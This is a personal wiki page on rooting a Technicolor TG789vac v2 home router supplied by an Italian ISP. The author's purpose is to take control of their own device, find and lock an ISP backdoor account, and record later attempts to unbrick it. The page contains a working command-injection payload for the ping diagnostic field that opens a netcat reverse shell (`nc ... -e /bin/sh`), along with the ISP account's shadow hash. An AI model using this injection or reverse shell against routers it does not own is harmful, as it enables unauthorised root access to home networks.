Rooting the router Technicolor TG789vac v2

This DSL/FTTH home router runs OpenWRT and can be rooted with a few simple commands.

I tested the following procedure on a model shipped by Tiscali, an Italian Service Provider.

Product Vendor:     Technicolor
Product Name:       MediaAccess TG789vac v2
Software Version:   16.3
Firmware Version:   16.3.7636-2921002-20170419153951
Bootloader Version: 2.0.85
Hardware Version:   VANT-6

The router's default IP address is 192.168.1.1 (beware that it has a DHCP server enabled); the web interface login is admin with password admin.

You need a PC connected to the same LAN (I used a GNU/Linux box). Issue the following command on the PC:

nc -lvvp 1025

this binds TCP port 1025 and starts listening for an incoming connection.

On the router, navigate to the Diagnostic tile, then to the Ping & Traceroute tab. In the IP Address text input, write the following command and then click the Send Ping Request button:

:::::::;nc 192.168.1.46 1025 -e /bin/sh

where the IP address must be that of your PC. On the PC you will get a root shell. Use the passwd command to change the root password:

passwd
Changing password for root
New password: MySecret
Retype password: MySecret
Password for root changed by root

Finally, permanently enable SSH access for the root user (but only from the LAN interface) by copying and pasting the following commands exactly:

sed -i.save 's#root:/bin/false#root:/bin/ash#' /etc/passwd
sed -i.save 's/0/1/' /etc/config/dropbear
sed -i 's/off/on/' /etc/config/dropbear
sed -i "s/wan/lan/" /etc/config/dropbear
/etc/init.d/dropbear restart

OpenWRT

The installed OpenWRT will fetch packages from this URL:

http://downloads.openwrt.org/chaos_calmer/15.05.1/brcm63xx-tch/VANTF/packages/Packages.gz

which indeed returns a Not Found error.

The Tiscali Backdoor

Once you have ssh access to the router, you can confirm that there is a Tiscali backdoor: just look at the /etc/passwd file:

tiscali:x:550:550:tiscali:/home/tiscali:/usr/bin/restricted-clash

and at the /etc/shadow one:

tiscali:$1$CEK1lG1Q$bcHMHT6KEzDvKJ8ODFyCB0:17275:0:99999:7:::

The password is unknown, but having that account enabled on the WAN side (as the Dropbear SSH server was, by default) is a high security risk. Tiscali surely knows that password, and maybe some bad guy has already cracked it, but you are not able to change or disable it.

This is enough to justify your right to have root privileges, and to use them to lock down the Tiscali backdoor:

passwd -l tiscali
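The check below is an added example, not part of the original page: a small POSIX sh audit (it runs in BusyBox ash) that lists every account in /etc/passwd and /etc/shadow that can actually log in (a usable shell and a real password hash), so you can spot accounts like tiscali before and after locking them. The passwd/shadow excerpts and the hashes in it are constructed placeholders, and lock_in_shadow only simulates what passwd -l does to the shadow line.

```shell
#!/bin/sh
# Constructed sample excerpts of /etc/passwd and /etc/shadow (placeholder hashes,
# not taken from a real router).
PASSWD_SAMPLE='root:x:0:0:root:/root:/bin/ash
daemon:x:1:1:daemon:/var:/bin/false
tiscali:x:550:550:tiscali:/home/tiscali:/usr/bin/restricted-clash
nobody:x:65534:65534:nobody:/var:/bin/false'
SHADOW_SAMPLE='root:$1$PLACEHOLDER$AAAAAAAAAAAAAAAAAAAAAA:17275:0:99999:7:::
daemon:*:0:0:99999:7:::
tiscali:$1$PLACEHOLDER$BBBBBBBBBBBBBBBBBBBBBB:17275:0:99999:7:::
nobody:*:0:0:99999:7:::'

# Print, one per line, the accounts that can log in: the passwd shell is not
# /bin/false or a nologin binary, AND the shadow hash is a real hash (not empty,
# "*" or locked with a leading "!").  $1 = passwd text, $2 = shadow text.
login_capable_accounts() {
    printf '%s\n' "$1" | while IFS=: read -r name pw uid gid gecos home shell; do
        case "$shell" in
            /bin/false|*nologin|'') continue ;;
        esac
        hash=$(printf '%s\n' "$2" | awk -F: -v u="$name" '$1 == u { print $2 }')
        case "$hash" in
            ''|'*'|'!'*) continue ;;   # no password or locked
        esac
        printf '%s\n' "$name"
    done
}

# Simulate `passwd -l NAME` on a shadow text: prefix the hash with "!" so the
# account can no longer authenticate.  $1 = shadow text, $2 = account name.
lock_in_shadow() {
    printf '%s\n' "$1" | awk -F: -v OFS=: -v u="$2" \
        '$1 == u && $2 !~ /^!/ { $2 = "!" $2 } { print }'
}

# On the router itself you would run the audit on the real files, e.g.:
#   login_capable_accounts "$(cat /etc/passwd)" "$(cat /etc/shadow)"
```

Before locking, the sample reports root and tiscali; after lock_in_shadow on tiscali only root remains, which is the state you want after passwd -l tiscali.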

Router Bricked

I succeeded in bricking this router, maybe after I installed the openvpn package, which required the kmod-tun one. I mixed packages from different architectures and sources, so I probably ended up with an unworkable mix. It is likely that my customization went into the overlay partition and the boot partition is still good, but unfortunately I don't know any method to hard-reset the overlay.

There are two possible reset methods:

  • Power off, keep the reset switch pressed, power on. This method can be used to start the BOOTP procedure, which can load and flash the stock firmware from a TFTP server. I did that, but the overlay partition is still messed up and the router does not revive.
  • Once the router is powered on, press the reset switch for 7 seconds or more. The router should erase custom data and restart. Unfortunately this did not work for me, maybe because the router is so messed up that the reset procedure does not even start.

I also tried to connect a serial adapter to the J5 tag, soldering three wires to it. According to some posts, the TX and RX lines should correspond to the R327 and R328 resistors, but I did not get any serial signal.

Credits and Web References

doc/appunti/hardware/technicolor_tg789vac_v2.1584032626.txt.gz · Last modified: 2020/03/12 18:03 by niccolo